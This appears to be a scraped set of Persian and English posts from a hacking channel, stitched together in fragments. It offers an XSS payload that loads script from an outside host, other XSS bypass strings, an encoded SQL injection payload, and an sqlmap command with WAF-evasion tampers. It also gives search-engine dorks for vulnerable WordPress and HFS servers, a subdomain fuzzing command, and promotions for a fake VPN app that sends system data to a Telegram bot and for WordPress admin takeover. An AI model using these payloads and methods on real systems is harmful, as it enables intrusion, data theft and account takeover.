<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

📚کتاب هنر اکسپلویت (Hacking)
🖋نویسنده: Jon Erickson
⚜️مترجم : سعید بیکی
🔰زبان : فارسی

  Google Dorking
یا گوگل هکینگ همگی مفهوم یکسانی دارند و به موضوع یکسانی اشاره می کنند. Google Dork به معنی افشای اطلاعات امنیتی به صورت ناخواسته در اینترنت است. گوگل تنها یک موتور جستجوگر است که برای یافتن متن ، تصاویر ، فیلم ها و اخبار استفاده می شود اما برای یک هکر می تواند ابزار کاربردی و مفیدی باشد

🔻pip install lolcat

🔻git clone https://github.com/Err0r-ICA/TheDorker

🔻cd TheDorker

🔻chmod +x *

🔻bash Dork

"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

ارسال اطلاعات سیستم به بات تلگرامی در قالب آپ فیلترشکن💀
ری‌اکشن فراموش نشه👍
Training to send system information in the form of a secret filter breaking application. Don't forget
support and reaction.
Do not forget the reaction👍

password: @erohack0 ‌

Fofa Query :: body="/wp-content/plugins/email-subscribers/" 2-
publicwww : "/wp-content/plugins/email-subscribers/"

Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334

sqlmap -u 'site.com/search.cmd?for…' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent

ما با استفاده از یک پلاگین وردپرس تونستیم به پنل پیشخوان وردپرس دسترسی پیدا کنیم و صفحه لاگین رو به بات تلگرام ارسال کنیم و یک یوزر با سطح دسترسی ادمین ایجاد کنیم.
Using the WordPress plugin, we were able to access the WordPress counter panel and send the login page to the Telegram bot and create a user with admin access
level.

🌟

برای آپلود آموزش ری‌اکشن فراموش نشه.

👁

React to embed the tutorial.

wfuzz -c -w subdomains -u "FUZZ[.]target" --sc 200,301,301,401 -Z

با استفاده از یک پلاگین ساده تونستیم آدرس صفحه لاگین ادمین رو پیدا کنیم و یک کاربر با سطح دسترسی ادمین ایجاد کنید.

pass: @erohack0

💻Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 

`'>+<script>alert()</script>`